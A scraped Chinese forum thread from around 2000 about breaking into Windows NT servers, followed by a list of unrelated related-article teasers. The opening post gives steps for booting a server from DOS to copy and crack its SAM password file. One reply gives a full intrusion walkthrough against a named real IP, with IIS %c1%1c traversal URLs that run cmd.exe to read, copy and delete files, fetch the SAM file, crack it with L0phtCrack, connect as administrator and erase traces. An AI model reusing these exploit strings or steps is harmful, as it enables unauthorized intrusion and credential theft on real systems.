此做法太多限制,很不可取!!!
现介绍一个直接明了简单的方法.
1.工具:dos启动盘,ntfsdos.exe(dos下看NTfs分区文件的工具),一个能解sam文件的黑客工具(网上很多).
2.步骤;
先用dos盘启动服务器,进去后,运行ntfsdos.exe,然后找到sam文件考出来,做后把sam文件拿到一台装有破解sam文件工具的机子上......
此方法,不需要有账号,不需登陆进服务器中,很轻松就能得到你想要的东西.你只需要有能接触服务器的机会,在花一两分钟的时间就行啦!
-
等级
本版专家分:0结帖率 100% -
网上有很多有关破解NT密码的文章,但是通观全局,一律是要有一个能登陆进NT内部的用户账号,然后获得存储NT密码的文件,或是进去后直接安装破解密码的黑客程序.
此做法太多限制,很不可取!!!
现介绍一个直接明了简单的方法.
1.工具:dos启动盘,ntfsdos.exe(dos下看NTfs分区文件的工具),一个能解sam文件的黑客工具(网上很多).
2.步骤;
先用dos盘启动服务器,进去后,运行ntfsdos.exe,然后找到sam文件考出来,做后把sam文件拿到一台装有破解sam文件工具的机子上......
此方法,不需要有账号,不需登陆进服务器中,很轻松就能得到你想要的东西.你只需要有能接触服务器的机会,在花一两分钟的时间就行啦!
展开阅读全文
-
等级
本版专家分:15勋章
-
- 状元 2000年 总版技术专家分年内排行榜第一
-
-
金牌
2000年11月 总版技术专家分月排行榜第一
2000年10月 总版技术专家分月排行榜第一
-
-
红花
2001年2月 Web 开发大版内专家分月排行榜第一
2000年11月 Web 开发大版内专家分月排行榜第一
2000年10月 Web 开发大版内专家分月排行榜第一
2000年11月 VC/MFC大版内专家分月排行榜第一
2000年10月 VC/MFC大版内专家分月排行榜第一
2000年11月 VB大版内专家分月排行榜第一
2000年10月 VB大版内专家分月排行榜第一
-
- 黄花 2000年12月 Web 开发大版内专家分月排行榜第二
-
-
呵呵,那你要先有机会进入放 NT Server 的机房中的再说吧!一个年营业额超过 100 万美元的公司的任何 NT Server 都不是你想看到就看到的,有没有软驱很难说,CD-ROM 上不上锁也很难说,CMOS 设不设密码也很难说。呵呵呵,好办法,我也早就想到了。
-
等级
本版专家分:0
-
都能直接接触到硬盘软区,那还谈什么黑它。只要你愿意并准备好承担相应后果,你可以制造比CIH强一万倍的破坏:砸了他!!!!!!!!!!!!! :-)
-
等级
本版专家分:0
-
您的言论也不堪一击
-
等级
本版专家分:0
-
经本人测试,下面的方法确实可行,我整理此篇文章的时间是2000.10.29,测试时间是
2000.10.28,测试的IP是 210.62.8.9 。入侵后的结果是http://210.62.8.9/index.html ,至10.29,此页面仍未恢复。
近来安全类技术网站提得最多的技术漏洞莫过于 %c1%1c 的问题。
c1 1c,中文简体里面没有这种字,照正常的情况根据内码转换文件
\winnt\system32\c_936.nls会编码成“?”。但对中文简体版IIS中
c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路
径串中的“..\”之后,所以可以突破IIS路径访问到上级目录。此漏洞
从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0
+SP1,好像台湾繁体中文也受此漏洞影响。
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32
/cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件,执行:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c
+copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制,
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除,哇!太利害了。
随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的:
获得Administrator权限。
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
把sam._文件拷贝到wwwroot文件内,输入:http://xxx.xxx.xxx.xxx/sam._
将sam._文件下载到本地,执行:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c
+del%20c:\inetpub\wwwroot\sam._清除痕迹。
在本机执行:C:>expand sam._ sam
启动l0phtcrack 2.5(可到http://rina.yofor.com/7index.html 下载),Import Sam File... 导入sam文件,Open Wordlist File...
打开一个字典,Run Crack,乖乖,要17个小时,不管它,让它慢慢破去,先睡个
觉先!五分钟后来一看,Administrator 的 Nt Password 居然是 123456,我昏,
网管们注意了,这种密码也可以取呀?执行:C:\>newletmein \\xxx.xxx.xxx -admin
扫描主机,发现管理员ID是:asdfghjk,执行:C:\>net use \\xxx.xxx.xxx.xxxc$
123456 /user:asdfghjk 成功联上对方主机,大功告成!窜到存放日志的目录:
winnt\system32\logfiles 看了看,呵呵!写个E_mail给主机的网管说明了漏洞情况^^
-
等级
本版专家分:0
-
只要把目录执行的权限关掉,或者仅限于本地执行,你的方法就不管用了,nt本身谈不上脆弱,好多的安全措施,就没人使用。
-
等级
本版专家分:572 -
严重同意edyang的观点。
nieyongxin,待我先去实验一下
:))
- NT 不堪一击!
网上有很多有关破解NT密码的文章,但是通观全局,一律是要有一个能登陆进NT内部的用户账号,然后获得存储NT密码的文件,或是进去后直接安装破解密码的黑客程序.此做法太多限制,很不可取!!!现介绍一个直接明了简单的方法....
- NT 不堪一击! (转)
NT 不堪一击! (转)[@more@]网上有很多有关破解NT密码的文章,但是通观全局,一律是要有一个能登陆进NT内部的用户账号,然后获得存储NT密码的文件,或是进去后直接安装破解密码的黑客程序.此做法太多限制,很不可取!!!现.....
- 小榕是英雄还是败类
本文是一篇安全技术顾问的手记,并没有发表过,文中所谈到的是整个黑客、红客及安全技术联盟存在的问题,因为小榕在这当中的特殊地位,所以本文以小榕为一个评论点。然而,作者真正想让读者关心的是在文中谈及事件所...
- 爬取百大弹幕,大家还是喜欢上罗老师的课!
可爱和性感在猛男面前 不堪一击 试图招手让摄像走开( 讲道理,00子是融入小破站最用心的艺人了 金杯银杯不如老百姓的口碑 所以首先感谢我自己() 害怕 东尼东尼东尼东尼东尼东尼东尼东尼 老坛~ 团长!!! 罗老师...
- ASP.NET 开发聊天室程序(英文) (转)
ASP.NET 开发聊天室程序(英文) (转)[@more@]Introduction: In its new avatar, ASP has undergone a metamorphosis. It is no longe...
- 【转载文章】批处理经典入门教程!(从不懂到高手)____附加我的学习笔记
这篇文章好像是51jb上推荐的比较好入门的一篇了,看了全文确实很有收获 文章推测写与2000-2004年之间,当时还是和学生的作者,可能还是同龄人。 现在人家是个大牛了,我现在还得从基础的学起,差距啊,不过还是很...
- BAT批处理文件教程
BAT批处理文件教程 这是一篇技术教程,我会用很简单的文字表达清楚自己的意思,你要你识字就能看懂,就能学到知识。写这篇教程的目的,是让每一个看过这些文字的朋友记住一句话:如果爱可以让事情变的更简单,那么...
- 软件加密技术及实现
软件加密技术及实现雷 鹏( 桂林电子工业学院 计算机系 )摘 要 当今盗版软件的泛滥成灾几乎已经成为了我们中国民族软件的灾难,为了防止软件的非法复制、盗版,保护软件开发商的利益,就必须对软件进行加密保护...
- 彩虹表原理详解及工具介绍
PS:这玩意偶前几天用了一下,确实强悍无比,在这个表面前,md5等公开的加密算法不堪一击啊。记得我之前的公司开发的游戏账号都用修改过的特有MD5加密算法,建议开发人员都这样搞,这样安全性就大大提高。如给哈希表...
- 一个可以自己布局的推箱子游戏 (附源码) (转)
一个可以自己布局的推箱子游戏 (附源码) (转)[@more@]个可以自己布局的推箱子游戏 (附源码) - 推箱子游戏,推箱子游戏下载 - 技术教程网 技术教程网 -- 实用技术参考 ......
- 中文RFC文档远程COM选项(二) (转)
中文RFC文档远程COM选项(二) (转)[@more@]文RFC文档远程COM选项(二) - com ,远程,rfc,中文rfc文档,rfc文档 - 技术教程网 技术教程网 -- 实用技术参考 ...
- 中文RFC文档环境登陆选项 (转)
中文RFC文档环境登陆选项 (转)[@more@]文RFC文档环境登陆选项 - rfc,rfc文档,rfc文档下载 - 技术教程网 技术教程网 -- 实用技术参考 ...
- 中文RFC Telnet验证 (转)
中文RFC Telnet验证 (转)[@more@]文RFC Telnet验证 - telnet,rfc,rfc 822,rfc 中文 - 技术教程网 技术教程网 -- 实用技术参考 ...
- WordPress — 性能瓶颈,遭遇攻击
上一篇写了关于 《突破WordPress性能瓶颈——使用WordPress站群做SEO推广》。在最近的时间里,服务器依旧会瘫...(每台Server安装了50个WP博客,每篇博客每天都有几十篇博客的更新,Google等各大主流爬虫成天都在爬)。...
- windows驱动的若干概念
什么是VxD? VxD乃 VIRTUAL X DRIVER.哎,说了也白说.其实就是虚拟设备驱动程序.是系统用于对各种硬件资源识别,管理,维护运作的扩展.VXD和VMM(虚拟机管理器)一起合作,维持着系统的运作.VxD模式从WIN3X时代就开始了...
- 备用
风叶林-资源最多的免费辅助教程论坛 -> 驱动保护 -> 反调试与反反调试内容收集帖 方便大家学习 [打印本页] ...反调试技术在调试一些病毒程序的时候,可能会碰到一些反调试技术,也就是说,被调试的...
- 转:VXD,KMD,WDM基本概念 (5千字)发信人:1212时 间:2001-11-12 14:52:00 详细信息:VXD,KMD,WDM基本概念 ...
导读: 详细信息: VXD,KMD,WDM基本概念 作者:陆麟 来来来,一起进入这黑黑的驱动程序世界.:) 这里要讲的是Vxd,Kernel Mode Driver,和WDM的一些基本问题. 什么是VxD? VxD乃 VIRTUAL X DRIVER.哎,说了也白说....
- VXD,KMD,WDM基本概念 作者:陆麟 (转)
VXD,KMD,WDM基本概念 作者:陆麟 (转)[@more@] VXD,KMD,WDM基本概念 作者:陆麟 来来来,一起进入这黑黑的驱动程序世界.:) 这里要讲的是Vxd,Kernel Mode driver,和W...
- Vxd,Kernel Mode Driver,和WDM的一些基本问题
来来来,一起进入这黑黑的驱动程序世界.:) 这里要讲的是Vxd,Kernel Mode Driver,和WDM的一些基本问题. 什么是VxD? VxD乃 VIRTUAL X DRIVER.哎,说了也白说.其实就是虚拟设备驱动程序.是系统用于对各种硬件资源...
- VXD,KMD,WDM基本概念
作者:陆麟来来来,一起进入这黑黑的驱动程序世界.:)这里要讲的是Vxd,Kernel Mode Driver,和WDM的一些基本问题.什么是VxD? VxD乃 VIRTUAL X DRIVER.哎,说了也白说.其实就是虚拟设备驱动程序.是系统用于对各种硬件资源...
- IT大败局----第九章 技术导向的失衡
第九章技术导向的失衡 一位成功的企业家说过: "什么叫市场导向型企业还是技术导向型企业? 你市场做不好还谈什么技术?" 技术导向——企业发展的独轮马车。... 技术——企业的核心竞争力,但如何把力量...
- 转自网络
终极dos批处理循环命令详解 格式:FOR [参数] %%变量名 IN (相关文件或命令) DO 执行的命令 作用:对一个或一组文件,字符串或命令结果中的每一个对象执行特定命令,达到我们想要的结果。 注意:在批处理文件中...
- 我是如何破解你的WINDOWS密码的 ?(1)
我是如何破解你的WINDOWS密码的 ?(1)密码可以看作我们主要,甚至某些情况下唯一可...就算***者无法在物理上接触到计算机,对于对外的Web应用,他们依然可以通过远程桌面协议或身份验证功能访问到服务器上的服务。...
- L0phtCrack 2.5使用方法
1、简介 L0phtCrack是在NT平台上使用的口令审计工具。它能通过保存在NT操作系统中cryptographic hashes列表来破解用户口令的。通常为了安全起见,用户的口令都是在经过加密之后保存在hash列表中的。这些敏感的信息...
- VXD,KMD,WDM基本概念 作者:陆麟
VXD,KMD,WDM基本概念作者:陆麟 来来来,一起进入这黑黑的驱动程序世界.:) 这里要讲的是Vxd,Kernel Mode Driver,和WDM的一些基本问题. 什么是VxD? VxD乃 VIRTUAL X DRIVER.哎,说了也白说.其实就是虚拟设备驱动程序....
- 以太坊ETH挖矿图文教程2.0
本教程页数不多,7页,主要描述如何使用以太坊ETH挖矿,图文并茂的展示和流程细节的体现,基本看了一遍就肯定能够学会了。
- SpringCloud微架构
SpringCloud是现在热门的RPC开发框架,也是以后的RPC开发趋势。在本套课程之中将为读者详细的讲解分布式技术的发展历史、以及各种分布式开发优缺点,同时详细的分析了整个SpringCloud中所涉及到的技术点以及相关作用。 本课程将基于Rest服务、SpringSecurity访问进行讲解,详细的讲解了Eureka注册发现服务、Eureka-HA机制、服务部署处理、Ribbon负载均衡、Feign接口映射、Hystrix熔断处理、Zuul代理访问等SpringCloud核心内容。随后在基础内容的讲解基础上又为读者讲解了SpringCloudConfig、GITHUB服务配置、消息服务、服务监控等辅助内容。
- python大作业--爬虫(完美应付大作业).zip
python大作业分享--30多个项目任你选(由于上传大小限制分多个文件上传。爬虫:https://download.csdn.net/download/weixin_43960044/12533382小游戏:https://download.csdn.net/download/weixin_43960044/12533379),应付大作业完全没问题。内涵30多个项目,随意挑选。爬虫(爬抖音视频、下载B站视频、怕天气预报等)小游戏(五子棋、坦克大战、贪吃蛇、拼图等)。
- 游戏引擎-场景编辑器
1.采用Qt作为界面库,通过该项目可以学习到Qt跨平台界面库的使用. 2.实现跨界面的拖拽功能.3. 3.实现属性表(绚酷控件)控件,完全可以在其他的项目中进行复用. 4.实现场景管理,采用节点方式实现高效的场景管理. 5.实现复杂的摄像机操作,可以旋转,缩放以及通过鼠标移动整个场景. 6.实现Ray方式拾取场景中的节点,模型. 7.实现模型的配置以及显示. 8.实现包围盒的计算和显示. 采用Qt界面库以及OpenGL实现一套场景编辑器,可以在场景中拖放模型,对模型作修改等功能,实现场景编辑器的核心功能.
- LABVIEW入门与实战开发100例.pdf
LABVIEW入门与实战开发100例,从基础到入门的基本实例。